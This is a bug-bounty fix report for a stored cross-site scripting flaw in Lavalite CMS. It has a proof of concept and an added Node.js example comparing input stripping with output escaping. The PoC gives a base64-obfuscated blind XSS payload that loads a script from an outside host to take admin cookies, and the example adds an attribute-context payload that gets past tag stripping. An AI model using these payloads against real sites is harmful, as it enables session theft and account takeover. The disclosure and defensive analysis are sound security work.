cms
Security Fix for Cross-site Scripting (XSS) - huntr.dev
https://huntr.dev/users/alromh87 has fixed the Cross-site Scripting (XSS) vulnerability 🔨. alromh87 has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 💵. Think you could fix a vulnerability like this?
Get involved at https://huntr.dev/
Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | https://github.com/418sec/cms/pull/1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/packagist/lavalite/cms/3/README.md
User Comments:
📊 Metadata *
Bounty URL: https://www.huntr.dev/bounties/3-packagist-lavalite%2Fcms
⚙️ Description *
Admin cookies and other details leading to an account takeover to a higher-level privilege from a client account of Lavalite CMS, and other multiple XSS in different pages due to acceptance of unsanitised data.
💻 Technical Description *
Fixed by implementing sanitizing middleware
🐛 Proof of Concept (PoC) *
- Log in to a client account and an admin account from entirely different browsers or through a private mode.
- In the client account, click on settings, update the address column with the blind payload, and save the updates made.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
- From the admin account, go to the endpoint http://localhost/admin/user/client.
- Booyah!!! XSS triggered.

🔥 Proof of Fix (PoF) *
After the fix, all input will be sanitized prior to being inserted and HTML components will be stripped from input.

👍 User Acceptance Testing (UAT)
Application works normally
@georgemjohn - let me know if you have any questions or thoughts for this fix.
Cheers! 👍
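The following is an added example, not code from the report, the pull request or Lavalite itself. It decodes the blind payload from the PoC above to show what `eval(atob(this.id))` actually runs on the admin page, and then models the two defences side by side: a `stripTags` function standing in for the strip-tags style input sanitizing the fix describes, and an `escapeHtml` function standing in for context-aware output encoding (what Blade's `{{ }}` does). The `renderAddressInput` helper, the `ATTR_PAYLOAD` string and the `compare` function are constructed for this illustration; the assumed attribute-context rendering is not taken from Lavalite's templates. It runs under Node.js with no browser.

```javascript
// Added example (not Lavalite's or the reporter's code): what the blind
// payload does, and why stripping tags on input is weaker than escaping
// on output. Runs under Node.js; no browser needed.

// The payload exactly as submitted in the PoC above (copied from the report).
const POC_PAYLOAD =
  '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>';

// Pull the base64 out of the id attribute and decode it the way the
// browser's atob() would, to see what eval() executes on the admin page.
function decodePayload(html) {
  const m = /\bid=([A-Za-z0-9+/=]+)/.exec(html);
  if (!m) return null;
  return Buffer.from(m[1], "base64").toString("utf8");
}

// Model of the reported fix: drop every HTML tag from the stored value
// (same idea as PHP's strip_tags). Assumed model, not the project's code.
function stripTags(s) {
  return s.replace(/<[^>]*>/g, "");
}

// Context-aware output encoding for an HTML body or attribute value:
// what Blade's {{ }} does, and what stops the browser treating stored
// data as markup regardless of what was accepted on input.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;",
  })[c]);
}

// Constructed attribute-context payload: no angle brackets, so tag
// stripping leaves it untouched; only escaping the quote neutralises it
// when the value is rendered inside value="...".
const ATTR_PAYLOAD = '" autofocus onfocus=alert(1) x="';

// Assumed admin-side rendering of the stored address (illustrative only).
function renderAddressInput(address) {
  return `<input name="address" value="${address}">`;
}

// Both defences applied to one payload, so the difference is visible.
function compare(payload) {
  return {
    strippedOnly: renderAddressInput(stripTags(payload)),
    escaped: renderAddressInput(escapeHtml(payload)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(decodePayload(POC_PAYLOAD));
  console.log(compare(POC_PAYLOAD));
  console.log(compare(ATTR_PAYLOAD));
}
```

Decoded, the payload creates a `<script>` element pointing at an external host and appends it to the admin's page, which is how the reporter's blind XSS callback collects session details. Stripping tags on input does remove the `<img>` vector from the PoC, but the attribute-context payload survives it unchanged and still lands as a live `onfocus` handler; only escaping at the point of output neutralises both. Input sanitizing is worth keeping as defence in depth, but the check a reviewer should add to a fix like this is that the admin views render user data through the escaping syntax rather than raw output.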
Hi, this issue was assigned with CVE-2020-28124. Is there any plan to fix this CVE?